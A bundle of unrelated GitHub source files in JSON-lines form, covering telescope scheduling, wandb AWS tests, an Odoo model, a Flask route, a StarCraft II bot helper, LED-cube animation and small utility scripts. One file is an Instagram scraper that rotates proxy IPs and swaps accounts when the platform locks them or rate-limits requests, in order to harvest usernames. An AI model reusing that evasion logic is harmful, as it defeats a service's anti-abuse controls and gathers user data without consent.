ordered_hp = hp_grow_argsort(self.reward)\n ordered_fields = self.hp2fields[ordered_hp]\n orig_order = np.arange(ordered_fields.size)\n # Remove duplicate field pointings\n _u_of, u_indx = np.unique(ordered_fields, return_index=True)\n new_order = np.argsort(orig_order[u_indx])\n best_fields = ordered_fields[u_indx[new_order]]\n\n if np.size(best_fields) < self.nvisit_block:\n # Let's fall back to the simple sort\n self.simple_order_sort()\n else:\n self.best_fields = best_fields[0 : self.nvisit_block]\n else:\n self.simple_order_sort()\n\n if len(self.best_fields) == 0:\n # everything was nans, or self.nvisit_block was zero\n return []\n\n # Let's find the alt, az coords of the points (right now, hopefully doesn't change much in time block)\n pointing_alt, pointing_az = _approx_ra_dec2_alt_az(\n self.fields[\"RA\"][self.best_fields],\n self.fields[\"dec\"][self.best_fields],\n conditions.site.latitude_rad,\n conditions.site.longitude_rad,\n conditions.mjd,\n lmst=conditions.lmst,\n )\n\n # Let's find a good spot to project the points to a plane\n mid_alt = (np.max(pointing_alt) - np.min(pointing_alt)) / 2.0 + np.min(pointing_alt)\n\n # Code snippet from MAF for computing mean of angle accounting for wrap around\n # XXX-TODO: Maybe move this to sims_utils as a generally useful snippet.\n x = np.cos(pointing_az)\n y = np.sin(pointing_az)\n meanx = np.mean(x)\n meany = np.mean(y)\n angle = np.arctan2(meany, meanx)\n radius = np.sqrt(meanx**2 + meany**2)\n mid_az = angle % (2.0 * np.pi)\n if radius < 0.1:\n mid_az = np.pi\n\n # Project the alt,az coordinates to a plane. Could consider scaling things to represent\n # time between points rather than angular distance.\n pointing_x, pointing_y = gnomonic_project_toxy(pointing_az, pointing_alt, mid_az, mid_alt)\n # Round off positions so that we ensure identical cross-platform performance\n scale = 1e4\n pointing_x = np.round(pointing_x * scale).astype(int)\n pointing_y = np.round(pointing_y * scale).astype(int)\n # Now I have a bunch of x,y pointings. Drop into TSP solver to get an effiencent route\n towns = np.vstack((pointing_x, pointing_y)).T\n # Leaving optimize=False for speed. 
The optimization step doesn't usually improve much.\n better_order = tsp_convex(towns, optimize=False)\n # XXX-TODO: Could try to roll better_order to start at the nearest/fastest slew from current position.\n observations = []\n counter2 = 0\n approx_end_time = np.size(better_order) * (\n self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1)\n )\n flush_time = conditions.mjd + approx_end_time / 3600.0 / 24.0 + self.flush_time\n for i, indx in enumerate(better_order):\n field = self.best_fields[indx]\n obs = empty_observation()\n obs[\"RA\"] = self.fields[\"RA\"][field]\n obs[\"dec\"] = self.fields[\"dec\"][field]\n obs[\"rotSkyPos\"] = 0.0\n obs[\"filter\"] = self.filtername1\n if self.nexp_dict is None:\n obs[\"nexp\"] = self.nexp\n else:\n obs[\"nexp\"] = self.nexp_dict[self.filtername1]\n obs[\"exptime\"] = self.exptime\n obs[\"field_id\"] = -1\n obs[\"note\"] = \"%s\" % (self.survey_note)\n obs[\"block_id\"] = self.counter\n obs[\"flush_by_mjd\"] = flush_time\n # Add the mjd for debugging\n # obs['mjd'] = conditions.mjd\n # XXX temp debugging line\n obs[\"survey_id\"] = i\n observations.append(obs)\n counter2 += 1\n\n result = observations\n return result\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/scheduler/surveys/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":19967,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"8395267711","text":"import os\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom botocore.exceptions import ClientError\nfrom wandb.sdk.launch.environment.aws_environment import AwsEnvironment\nfrom wandb.sdk.launch.errors import LaunchError\n\n\ndef _get_environment():\n return AwsEnvironment(\n region=\"us-west-2\",\n secret_key=\"secret_key\",\n access_key=\"access_key\",\n session_token=\"token\",\n )\n\n\ndef test_from_default(mocker) -> None:\n \"\"\"Test creating an AWS environment from the default credentials.\"\"\"\n boto3 = MagicMock()\n session = MagicMock()\n credentials = MagicMock()\n credentials.access_key = \"access_key\"\n credentials.secret_key = \"secret_key\"\n credentials.token = \"token\"\n session.get_credentials.return_value = credentials\n boto3.Session.return_value = session\n mocker.patch(\"wandb.sdk.launch.environment.aws_environment.boto3\", boto3)\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment\", MagicMock()\n )\n default_environment = AwsEnvironment.from_default(region=\"us-west-2\")\n assert default_environment._region == \"us-west-2\"\n assert default_environment._access_key == \"access_key\"\n assert default_environment._secret_key == \"secret_key\"\n assert default_environment._session_token == \"token\"\n\n\n@pytest.mark.asyncio\nasync def test_verify_storage(mocker):\n \"\"\"Test that the AwsEnvironment correctly verifies storage.\"\"\"\n session = MagicMock()\n client = MagicMock()\n session.client.return_value = client\n client.head_bucket.return_value = \"Success!\"\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n environment = _get_environment()\n await environment.verify_storage_uri(\"s3://bucket/key\")\n\n def _raise(*args, **kwargs):\n raise ClientError({}, \"Error\")\n\n environment.get_session = _raise\n with pytest.raises(LaunchError):\n await environment.verify_storage_uri(\"s3://bucket/key\")\n\n\n@pytest.mark.asyncio\nasync def 
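Above, the chosen pointings are gnomonic-projected to a plane, rounded to integers for cross-platform determinism, and handed to a travelling-salesman heuristic so the slews form an efficient route. A toy greedy nearest-neighbour ordering over such projected points (a sketch — the actual `tsp_convex` solver is convex-hull based and not reproduced here):

```python
# Greedy nearest-neighbour route over integer-projected pointings;
# an illustrative stand-in for the tsp_convex call above.
import numpy as np

rng = np.random.default_rng(1)
towns = np.round(rng.random((10, 2)) * 1e4).astype(int)

order = [0]
remaining = set(range(1, len(towns)))
while remaining:
    last = towns[order[-1]]
    nxt = min(remaining, key=lambda i: np.sum((towns[i] - last) ** 2))
    order.append(nxt)
    remaining.remove(nxt)
print(order)
```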
test_verify(mocker):\n \"\"\"Test that the AwsEnvironment correctly verifies.\"\"\"\n session = MagicMock()\n client = MagicMock()\n identity = MagicMock()\n identity.get.return_value = \"123456789012\"\n client.get_caller_identity.return_value = identity\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n environment = _get_environment()\n await environment.verify()\n\n\n@pytest.mark.asyncio\nasync def test_upload_directory(mocker):\n \"\"\"Test that we issue the correct api calls to upload files to s3.\"\"\"\n \"\"\"\n Step one here is to mock the os.walk function to return a list of files\n corresponding to the following directory structure:\n source_dir\n ├── Dockerfile\n ├── main.py\n ├── module\n │ ├── submodule\n │ │ ├── that.py\n │ │ └── this.py\n │ ├── dataset.py\n │ ├── eval.py\n │ └── model.py\n └── requirements.txt\n \"\"\"\n source_dir = \"source_dir\"\n walk_output = [\n (f\"{source_dir}\", None, [\"Dockerfile\", \"main.py\", \"requirements.txt\"]),\n (os.path.join(source_dir, \"module\"), \"\", [\"dataset.py\", \"eval.py\", \"model.py\"]),\n (\n os.path.join(source_dir, \"module\", \"submodule\"),\n \"\",\n [\n \"that.py\",\n \"this.py\",\n ],\n ),\n ]\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.walk\",\n return_value=walk_output,\n )\n session = MagicMock()\n client = MagicMock()\n\n session.client.return_value = client\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isdir\", return_value=True\n )\n\n environment = AwsEnvironment(\n region=\"us-west-2\",\n access_key=\"access_key\",\n secret_key=\"secret_key\",\n session_token=\"token\",\n )\n await environment.upload_dir(source_dir, \"s3://bucket/key\")\n assert client.upload_file.call_count == 8\n assert client.upload_file.has_calls(\n [\n mocker.call(\n os.path.join(source_dir, \"Dockerfile\"),\n f\"{source_dir}/Dockerfile\",\n \"bucket\",\n \"key/Dockerfile\",\n ),\n mocker.call(\n os.path.join(source_dir, \"main.py\"),\n \"bucket\",\n \"key/main.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"requirements.txt\"),\n \"bucket\",\n \"key/requirements.txt\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"dataset.py\"),\n \"bucket\",\n \"key/module/dataset.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"eval.py\"),\n \"bucket\",\n \"key/module/eval.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"model.py\"),\n \"bucket\",\n \"key/module/model.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"submodule\", \"that.py\"),\n \"bucket\",\n \"key/module/submodule/that.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"submodule\", \"this.py\"),\n \"bucket\",\n \"key/module/submodule/this.py\",\n ),\n ]\n )\n\n\n@pytest.mark.asyncio\nasync def test_upload_invalid_path(mocker):\n \"\"\"Test that we raise an error for invalid paths.\n\n The upload can't proceed if\n - the source path is not a directory, or\n - the destination path is not a valid S3 URI\n \"\"\"\n environment = _get_environment()\n with pytest.raises(LaunchError) as e:\n await environment.upload_dir(\"invalid_path\", \"s3://bucket/key\")\n assert \"Source invalid_path does not exist.\" == str(e.value)\n 
mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isdir\",\n return_value=True,\n )\n for path in [\"s3a://bucket/key\", \"s3n://bucket/key\"]:\n with pytest.raises(LaunchError) as e:\n await environment.upload_dir(\"tests\", path)\n assert f\"Destination {path} is not a valid s3 URI.\" == str(e.value)\n\n\n@pytest.mark.asyncio\nasync def test_upload_file(mocker):\n client = MagicMock()\n session = MagicMock()\n session.client.return_value = client\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isfile\", return_value=True\n )\n environment = _get_environment()\n await environment.upload_file(\"source_file\", \"s3://bucket/key\")\n assert client.upload_file.call_args_list[0][0] == (\n \"source_file\",\n \"bucket\",\n \"key\",\n )\n with pytest.raises(LaunchError) as e:\n await environment.upload_file(\"source_file\", \"s3a://bucket/key\")\n assert e.content == \"Destination s3a://bucket/key is not a valid s3 URI.\"\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests/test_launch/test_environment/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"4087455885","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass PosServiceBed(models.Model):\n _name = 'pos.service.bed'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n\n name = fields.Char(\"Name\", track_visibility='onchange')\n code = fields.Char(\"Code\", track_visibility='onchange', copy=False)\n room_id = fields.Many2one('pos.service.room', \"Room\",track_visibility='onchange')\n state = fields.Selection([('ready', \"Ready\"), ('busy', \"Busy\"), ('maintenance', \"Maintenance\")], default='ready')\n branch_id = fields.Many2one('res.branch', related=\"room_id.branch_id\", string=\"Branch\",track_visibility='onchange', store=True, readonly=True)\n active = fields.Boolean(\"Active\",default=True, track_visibility='onchange')\n # time = fields.Float(\"Time\")\n date_start = fields.Datetime(\"Date Start\")\n hour = fields.Float(\"Hour\")\n minutes = fields.Float(\"Minutes\")\n seconds = fields.Float(\"Seconds\")\n employee_ids = fields.Many2many('hr.employee', 'hr_employee_employee_pos_service_bed',\n 'employee_pos_service_bed_id', 'hr_employee_id', string='Employee')\n employee_name = fields.Char(string='Employee', compute='get_name_employee')\n doctor_ids = fields.Many2many('hr.employee', 'hr_employee_doctor_pos_serivce_bed',\n 'doctor_pos_service_bed_id', 'hr_employee_id', string='Doctor')\n doctor_name = fields.Char(string='Doctor', compute='get_name_employee')\n\n @api.depends('employee_ids', 'doctor_ids')\n def get_name_employee(self):\n for detail in self:\n if detail.employee_ids:\n employee_name = ''\n for emp in detail.employee_ids:\n employee_name += emp.name + ','\n detail.employee_name = employee_name\n else:\n # was detail.doctor_name; this branch must clear the employee field\n detail.employee_name = None\n\n if detail.doctor_ids:\n doctor_name = ''\n for doctor in detail.doctor_ids:\n doctor_name += doctor.name + ','\n detail.doctor_name = doctor_name\n else:\n detail.doctor_name = None\n\n _sql_constraints = [\n ('code_uniq', 'unique(code)', 'Code is unique'),\n ]\n\n @api.model\n def name_search(self, name, args=None, operator='ilike', limit=100):\n args = args or []\n if name:\n args = 
['|', '|', ('name', operator, name), ('code', operator, name), ('room_id.name', operator, name)] + args\n res = self.search(args, limit=limit)\n return res.name_get()\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = '%s[%s:%s]' % (str(record.name), str(record.branch_id.code), str(record.room_id.name), )\n result.append((record.id, name))\n return result\n\n @api.multi\n def action_maintenace(self):\n self.state = 'maintenance'\n\n @api.multi\n def action_ready(self):\n self.state = 'ready'","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/izi_manage_room/models/bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40417474084","text":"from flask import Blueprint, render_template, request\n\nfrom ..api.geolocation import get_location_info\n\n# Create both blueprints, one per endpoint, specifying the template folder\ngeolocation_main = Blueprint(\"geolocation_main\", __name__, template_folder='template')\ngeolocation = Blueprint(\"geolocation\", __name__, template_folder='template')\n\n# Main blueprint, served at the root route\n@geolocation_main.route(\"/\")\ndef get_location():\n return render_template('index.html')\n\n# Endpoint for calculating the distance between the provided location and the Moscow Ring Road.\n# It receives a location and runs get_location_info\n@geolocation.route(\"/distance\", methods=['POST'])\ndef get_distance():\n if request.method == 'POST':\n address = request.form[\"address\"]\n ubicacion = get_location_info(address)\n\n return ubicacion\n","repo_name":"aleTorres05/Flask_example","sub_path":"app/blueprint/example_blueprint.py","file_name":"example_blueprint.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15549454518","text":"import json\nimport re\nimport traceback\nimport time\nimport os\n\nimport requests\nfrom .ins_account import update_account_status\nfrom fake_useragent import UserAgent\nfrom .request import RequestConfig as reqc, cutover_proxy\nfrom lxml import etree\nfrom .ins_login import login_and_check\n\nsleep_second = 120\n\nclass Form:\n\n def __init__(self, max_id, media_ids, page, include_persistent=0, surface='grid', tab='recent'):\n self.max_id = max_id\n self.media_ids = media_ids\n self.page = page\n self.include_persistent = include_persistent\n self.surface = surface\n self.tab = tab\n\n @property\n def data(self):\n return (dict(\n {\n 'include_persistent': self.include_persistent,\n 'max_id': self.max_id,\n 'next_media_ids': self.media_ids,\n 'page': self.page,\n 'surface': self.surface,\n 'tab': self.tab\n }\n ))\n\n def __len__(self):\n return len(repr(self.data))\n\n\nclass Request:\n\n def __init__(self, headers, cookies, tag):\n self.tag = tag\n self.headers = headers\n self.cookies = cookies\n\n def get_sections(self, form):\n return reqc.req_session().post(f'https://i.instagram.com/api/v1/tags/{self.tag}/sections/',\n headers=self.headers,\n data=form.data, cookies=self.cookies, timeout=30)\n\n def get_tag_page(self, url):\n return reqc.req_session().get(f'{url}' + self.tag + '/', headers=self.headers, cookies=self.cookies)\n\n def get_checkpoint_url(self, url):\n return reqc.req_session().get(f'{url}', headers=self.headers, cookies=self.cookies)\n\n\ndef request_header():\n headers = {\n 'User-Agent': 
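The two Flask blueprints above only become routable once an application registers them. A minimal app factory showing that wiring (a sketch — the import path mirrors the repo layout app/blueprint/example_blueprint.py but is assumed):

```python
# Hypothetical app factory registering the two blueprints defined above.
from flask import Flask

def create_app():
    app = Flask(__name__)
    # assumed import path, matching app/blueprint/example_blueprint.py
    from app.blueprint.example_blueprint import geolocation_main, geolocation
    app.register_blueprint(geolocation_main)
    app.register_blueprint(geolocation)
    return app

if __name__ == "__main__":
    create_app().run(debug=True)
```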
UserAgent().Chrome, # Google Chrome\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'X-Csrftoken': '',\n 'x-ig-app-id': '936619743392459',\n 'Origin': 'https://www.instagram.com',\n 'Referer': 'https://www.instagram.com/',\n 'Connection': 'close'\n }\n\n return headers\n\n\ndef get_cookie():\n with open('../cookies.txt', 'r') as file:\n return file.read()\n\n\ndef access_tag_page(tag, url=\"https://www.instagram.com/explore/tags/\"):\n global sleep_second\n headers = request_header()\n cookies = dict(eval(get_cookie()))\n headers['X-Csrftoken'] = cookies.get('csrftoken')\n request = Request(headers=headers, cookies=cookies, tag=tag)\n req = request.get_tag_page(url)\n if req.status_code == 200:\n html = req.text\n patter = re.compile(r'\"next_max_id\":\"(.*?)\",\"next_page\":(.*?),\"next_media_ids\":(.*?)}')\n list_data = re.findall(patter, html)\n\n next_max_id = ''\n next_page = ''\n next_media_ids = []\n for tuple_data in list_data:\n id = tuple_data[0]\n if len(id) > len(next_max_id):\n next_max_id = id\n next_page = tuple_data[1]\n next_media_ids = tuple_data[2]\n else:\n break\n\n all_blog_url_list = []\n next_page = 1\n count = 0\n while next_page >= 1:\n # random_second = random.randint(2, 5)\n # print('sleeping for', str(random_second) + 's')\n # time.sleep(random_second)\n\n form = Form(max_id=next_max_id, page=next_page, media_ids=next_media_ids)\n result = cycle_get_section_data(request, form)\n try:\n\n if 'data' in result:\n section_data = result.get('data')\n next_max_id = section_data.get('next_max_id')\n next_page = section_data.get('next_page')\n next_media_ids = str(list(map(int, section_data.get('next_media_ids'))))\n blog_url_list = section_data.get('blog_url_list')\n sections = section_data.get('sections')\n all_blog_url_list.extend(blog_url_list)\n print(all_blog_url_list)\n if sections == []: # an empty sections list means we have paged to the end\n break\n else:\n print(all_blog_url_list)\n except Exception:\n print('exception', traceback.print_exc())\n break\n '''\n Request counting:\n after 20 API calls, wait 120 seconds\n '''\n count += 1\n if count >= 20:\n # after 20 requests, pause and switch IP\n count = 0\n print('Made 20 requests; pausing the thread for {0} s, then switching IP and continuing...'.format(sleep_second))\n cutover_proxy() # switch to a new IP for crawling\n time.sleep(sleep_second)\n else:\n pass\n\n else:\n print('Finished looping over section data.....')\n\n # After the loop, save all collected blog URLs to {$tag}-blog-url-{$datetime}.txt\n data_time = time.strftime(\"%Y-%m-%d\", time.localtime())\n write_path = os.path.expandvars('$HOME') + '/tmp'\n with open('{0}/{1}-blog-url-{2}.txt'.format(write_path, tag, data_time), 'w') as blog_url_file:\n blog_url_file.write(str(all_blog_url_list))\n\n # Once the URLs are saved, return the data so the blog pages can be visited\n data = dict({\n 'blog_url_list': all_blog_url_list\n })\n\n return dict({\n 'status': req.status_code,\n 'reason': req.reason,\n 'text': req.text,\n 'data': data\n })\n\n\n else:\n return dict({\n 'status': req.status_code,\n 'reason': req.reason,\n 'text': req.text\n })\n\n\ndef cycle_get_section_data(request, form):\n try:\n\n req_section = request.get_sections(form)\n\n if req_section.status_code == 200:\n dict_json = req_section.json()\n sections = dict_json.get('sections')\n data = dict({\n 'next_max_id': dict_json.get('next_max_id'),\n 'next_page': dict_json.get('next_page'),\n 'next_media_ids': dict_json.get('next_media_ids'),\n 'blog_url_list': resolve_section_data(sections),\n 'sections': sections\n })\n\n return dict({\n 'status': req_section.status_code,\n 'reason': req_section.reason,\n 'text': req_section.text,\n 'data': data\n })\n else:\n if 
\"https://i.instagram.com/challenge/?next=\" in req_section.text:\n result_json = json.loads(req_section.text)\n # 账户被检测到机器人行为,修改当前账户状态,并更换新的账户爬取\n if result_json.get(\"lock\") == True and result_json.get(\"status\") == \"fail\":\n print('账户被检测到有状态异常,正在切换至新的账户...休眠{0}秒后执行'.format(sleep_second))\n update_account_status(\"sleep\")\n # 校验并重新登录新的账号进行操作\n login_and_check()\n time.sleep(sleep_second)\n\n elif req_section.status_code == 429:\n print('请求过于频繁,切换ip和账号并在10分钟后,重新爬取...')\n login_and_check()\n cutover_proxy()\n time.sleep(600)\n\n\n return dict({\n 'status': req_section.status_code,\n 'reason': req_section.reason,\n 'text': req_section.text\n })\n\n except json.JSONDecodeError:\n # 获取response中的html元素信息,判断当前页面是否重定向到登录页\n html_text = req_section.text.encode('utf-8')\n html = etree.HTML(html_text)\n html_result = html.xpath('/html[contains(@class,\"logged-in\")]')\n if html_result:\n # 校验并重新登录新的账号进行操作\n print('正在切换新的账号.......')\n login_and_check()\n return dict({})\n\n except requests.RequestException:\n print('ssl exception:', traceback.print_exc())\n print('切换新的ip,休眠{0}秒后执行....'.format(sleep_second))\n # 切换可用的新IP\n cutover_proxy()\n time.sleep(sleep_second)\n return dict({})\n\n\ndef resolve_section_data(sections):\n blog_url_list = []\n for section in sections:\n layout_content = section.get('layout_content')\n medias = layout_content.get('medias')\n for media in medias:\n media_data = media.get('media')\n try:\n comment_count = int(media_data.get('comment_count', 0))\n like_count = int(media_data.get('like_count', 0))\n except TypeError:\n print('typeError exception:', traceback.print_exc())\n\n if comment_count + like_count >= 300:\n user = media_data.get('user')\n username = user.get('username')\n blog_url_list.append('https://www.instagram.com/' + username)\n\n return blog_url_list\n\n\nif __name__ == '__main__':\n tag = 'smok'\n tag_result = access_tag_page(tag)\n print(tag_result)\n","repo_name":"shopastro/shopastro-python","sub_path":"instagram/packs/ins_tags_data.py","file_name":"ins_tags_data.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71390698987","text":"# Imports:\n\n# StarCraft II:\n# > Bot AI:\nfrom sc2.bot_ai import BotAI\n\n# > Position:\nfrom sc2.position import Point3\n\n# MapAnalyzer:\n# > MapData:\nfrom sc2city.MapAnalyzer.MapData import MapData\n\n# Typing:\nimport typing\n\n# Numpy:\nimport numpy\n\n# Classes:\n\n\"\"\"\n* Interface class to allow SC2City to access the MapAnalyzer API.\n*\n* @param AI --> The SC2City AI object.\n*\n* @param debug --> A setting to enable debugging features for functions.\n*\n\"\"\"\n\n\nclass MapAnalyzerInterface:\n # Constants:\n EXTRA_GROUND_DISTANCE: int = 3\n EXTRA_AIR_DISTANCE: int = 3\n\n # Initialization:\n def __init__(self, AI: BotAI = None, debug: bool = False) -> None:\n # Miscellaneous:\n self.AI: BotAI = AI\n\n # Objects:\n self.MapData: MapData = MapData(bot=AI, loglevel=\"INFO\")\n\n # Booleans:\n self.debug: bool = debug\n\n # Grids:\n self.enemy_ground_to_air_grid: typing.Optional[numpy.ndarray] = None\n self.enemy_ground_grid: typing.Optional[numpy.ndarray] = None\n self.enemy_air_grid: typing.Optional[numpy.ndarray] = None\n\n self.reaper_grid: typing.Optional[numpy.ndarray] = None\n\n # Methods:\n\n \"\"\"\n * A method to construct influential maps indicating the enemy's influence.\n *\n \"\"\"\n\n def create_influence_maps(self) -> None:\n # Constructing Grids:\n self.enemy_ground_to_air_grid: 
numpy.ndarray = self.MapData.get_clean_air_grid(\n default_weight=1\n )\n self.enemy_ground_grid: numpy.ndarray = self.MapData.get_pyastar_grid(\n default_weight=1\n )\n self.enemy_air_grid: numpy.ndarray = self.MapData.get_pyastar_grid(\n default_weight=1\n )\n\n self.reaper_grid: numpy.ndarray = self.MapData.get_climber_grid(\n default_weight=1\n )\n\n for enemy_unit in self.AI.MemoryManager.enemy_unit_tag_to_unit_object.values():\n # Debugging:\n if self.debug:\n self.AI.client.debug_sphere_out(\n p=enemy_unit, r=enemy_unit.radius, color=(255, 0, 0)\n )\n\n if enemy_unit.can_attack_ground:\n enemy_total_range: float = (\n enemy_unit.radius\n + enemy_unit.ground_range\n + self.EXTRA_GROUND_DISTANCE\n )\n\n (\n self.enemy_ground_grid,\n self.reaper_grid,\n ) = self.MapData.add_cost_to_multiple_grids(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grids=[self.enemy_ground_grid, self.reaper_grid],\n weight=enemy_unit.ground_dps,\n )\n elif enemy_unit.can_attack_air:\n enemy_total_range: float = (\n enemy_unit.radius + enemy_unit.air_range + self.EXTRA_AIR_DISTANCE\n )\n\n if enemy_unit.is_flying:\n self.enemy_air_grid = self.MapData.add_cost(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grid=self.enemy_air_grid,\n weight=enemy_unit.air_dps,\n )\n else:\n (\n self.enemy_ground_to_air_grid,\n self.enemy_air_grid,\n ) = self.MapData.add_cost_to_multiple_grids(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grids=[self.enemy_ground_to_air_grid, self.enemy_air_grid],\n weight=enemy_unit.air_dps,\n )\n\n if self.debug:\n # Variables:\n color: Point3 = Point3((201, 168, 79))\n size: int = 14\n\n for x, y in zip(*numpy.where(self.enemy_ground_grid > 1)):\n height: float = self.AI.get_terrain_z_height(\n self.AI.start_location\n )\n\n position: Point3 = Point3((x, y, height))\n\n if self.enemy_ground_grid[x, y] == numpy.inf:\n continue\n\n value: int = int(self.enemy_ground_grid[x, y])\n self.AI.client.debug_text_world(\n text=str(value), pos=position, color=color, size=size\n )\n","repo_name":"savelas81/Sc2City","sub_path":"sc2city/interfaces/MA_interface.py","file_name":"MA_interface.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33816588000","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport locators\n\ndef main():\n verifyCatalogSwitch()\n print(getattr(globals()['locators'],'leftBar_catalog_switch'))\n\n\ndef verifyCatalogSwitch():\n print(locators.leftBar_catalog_switch)\n print(locators.leftBar_tool_freeze)\n\nif __name__=='__main__':\n #inputfile=r'C:\\ProgramData\\TW\\AcqAltair\\log\\acqaltair_20220712.csv'\n inputfile=r'\\\\10.196.98.73\\Test\\Quality\\Test_Obj_ScanFlow\\Precision\\Precision_Result_Ver1.0.8.302.d145\\Offline_Processing_Speed\\3600\\ScanFlow_20230109.csv'\n main()\n #calcTimeDiff('2021-05-21T15:25:30', '2021-05-21T15:27:21')","repo_name":"flying0dancing/scanflowuiauto","sub_path":"suite_scanflow_auto/shared/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115883257","text":"from .cube import *\nimport random\n\ndef fill():\n c = Cube()\n on = True\n while True:\n colour = hue_to_colour(random.randint(0, 359))\n all_positions = [Pos(x, y, z) for x in range(c.size) for y in range(c.size) for z in range(c.size)]\n random.shuffle(all_positions)\n for counter, position in 
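The MapAnalyzer `add_cost` calls above stamp a weight onto every grid cell inside an enemy's threat radius. The core of that operation is a boolean distance mask on a NumPy array (a simplified sketch, not the MapAnalyzer implementation):

```python
# Radial cost stamp on a 2D influence grid, analogous to add_cost above.
import numpy as np

def add_cost(grid, center, radius, weight):
    ys, xs = np.ogrid[: grid.shape[0], : grid.shape[1]]
    mask = (xs - center[0]) ** 2 + (ys - center[1]) ** 2 <= radius ** 2
    grid[mask] += weight
    return grid

grid = np.ones((20, 20))
grid = add_cost(grid, center=(10, 10), radius=4.5, weight=12.0)  # e.g. ground dps
print(grid[10, 6:15])
```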
enumerate(all_positions):\n if on:\n c.set(position, colour)\n else:\n c.set(position, Colour.BLACK)\n if counter % c.size == c.size - 1:\n yield c.copy()\n on = not on\n yield True","repo_name":"abryant/LED-Cube","sub_path":"visuals/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3789511578","text":"import os, sys\nimport json\n\n# sys.argv[0]=\"3_print_required_file_names_in_the_current_phase.py\"\n# sys.argv[1:]=[\"--split_info_file\", \"./devPhase/challenge_data_split_devPhase.json\"]\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--split_info_file', type=str, help='Path to split file, such as \\{devPhase, chaPhase\\}/challenge_data_split_devPhase_\\{devPhase, chaPhase\\}.json')\n args = parser.parse_args()\n\n with open(args.split_info_file, 'r') as fp:\n sub_id_with_val_test_ids = json.load(fp)\n\n key_to_list = ''\n PhaseName = args.split_info_file.split('/')[-1].split('.')[0].split('_')[-1]\n if(PhaseName == 'devPhase'):\n key_to_list = 'validation'\n print('\\nFor the Developement Phase, please submit a zip file containing the following files:')\n elif(PhaseName == 'chaPhase'):\n key_to_list = 'test'\n print('\\nFor the Challenge Phase, please submit a zip file containing the following files:')\n else:\n print('\\nPlease use *_devPhase.json for the Development Phase or *_chaPhase.json for the Challenge Phase to list the required submission file names.\\n')\n\n if(PhaseName == 'devPhase' or PhaseName == 'chaPhase'):\n type_specified_list = []\n for key_tmp in sub_id_with_val_test_ids.keys():\n for i in range(0, len(sub_id_with_val_test_ids[key_tmp][key_to_list])):\n sub_name = sub_id_with_val_test_ids[key_tmp][key_to_list][i] + '.png'\n print(sub_name)\n print('readme.txt\\n')\n","repo_name":"solanian/view-synthesis-challenge","sub_path":"starting_kit_ILSH/3_print_required_file_names_in_the_current_phase.py","file_name":"3_print_required_file_names_in_the_current_phase.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
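fill.py draws a random hue and converts it to an RGB colour via the cube package's `hue_to_colour`. One plausible standard-library implementation of such a conversion (an assumption — the real helper lives in `.cube` and is not shown in this corpus):

```python
# Plausible hue -> RGB conversion for hue_to_colour (assumed behaviour).
import colorsys

def hue_to_colour(hue_degrees):
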